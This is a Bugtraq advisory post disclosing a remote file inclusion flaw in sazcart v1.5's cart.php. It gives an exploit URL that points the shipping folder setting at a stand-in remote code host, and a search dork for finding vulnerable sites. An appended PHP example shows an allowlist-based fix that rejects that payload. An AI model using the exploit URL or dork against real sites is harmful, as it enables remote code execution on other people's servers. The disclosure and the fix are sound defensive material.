Bugtraq mailing list archives
sazcart v1.5 (cart.php) Remote File include
From: emel_gw_ini () yahoo com
Date: 9 Jan 2007 22:20:54 -0000
*********************---Hitamputih crew---********************************
* Bug Found By : IbnuSina
* vendor : http://sazcart.com/site
* Risk : High
* Greetz :
* Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid
* and all member hitamputih crew community
***************************************************************************

bug found on admin/controls/cart.php

include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;
include($_saz['settings']['taxfolder'] . "/tax.php");
$Tax = new Tax;

exploit :
http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?

google dork: "powered by sazcart"
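A hardened form of the include pattern reported above, as an added example that is not part of the original post and is not SazCart code. It assumes the folder setting must be one of a fixed set of local directories and that the script can be reached directly with $_saz filled from the request (as with register_globals); resolve_module(), SAZ_ENTRY and the folder names are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example, not SazCart code. resolve_module(), SAZ_ENTRY and the folder
// names are hypothetical. Assumption: settings come from a trusted config file.

// In an include-only script such as admin/controls/cart.php, a first line like
//   defined('SAZ_ENTRY') or exit;
// stops direct requests, so $_saz can only be set by the front controller.

function resolve_module(string $baseDir, $folder, string $file, array $allowed): string
{
    // URLs, traversal strings and query-string arrays never equal an allowlisted name.
    if (!is_string($folder) || !in_array($folder, $allowed, true)) {
        throw new InvalidArgumentException('module folder not allowlisted');
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $folder . '/' . $file);
    // realpath() is false for missing files; the prefix check stops symlink escapes.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('module file missing or outside base directory');
    }
    return $path;
}

// Constructed demo: a temporary module tree and values a request could carry.
$base = sys_get_temp_dir() . '/saz_demo_' . getmypid();
mkdir($base . '/shipping_flat', 0700, true);
file_put_contents($base . '/shipping_flat/shipping.php', "<?php class Shipping {}\n");

foreach (['shipping_flat', 'HTTP://EVILCODE?', '../../etc', ['x']] as $candidate) {
    try {
        $file = resolve_module($base, $candidate, 'shipping.php', ['shipping_flat']);
        require_once $file;
        echo "included: $file\n";
    } catch (Exception $e) {
        echo 'rejected: ', json_encode($candidate, JSON_UNESCAPED_SLASHES),
             ' (', $e->getMessage(), ")\n";
    }
}

unlink($base . '/shipping_flat/shipping.php');
rmdir($base . '/shipping_flat');
rmdir($base);
```

Only the allowlisted local folder is included; the URL, the traversal string and the array value are all rejected before any include runs.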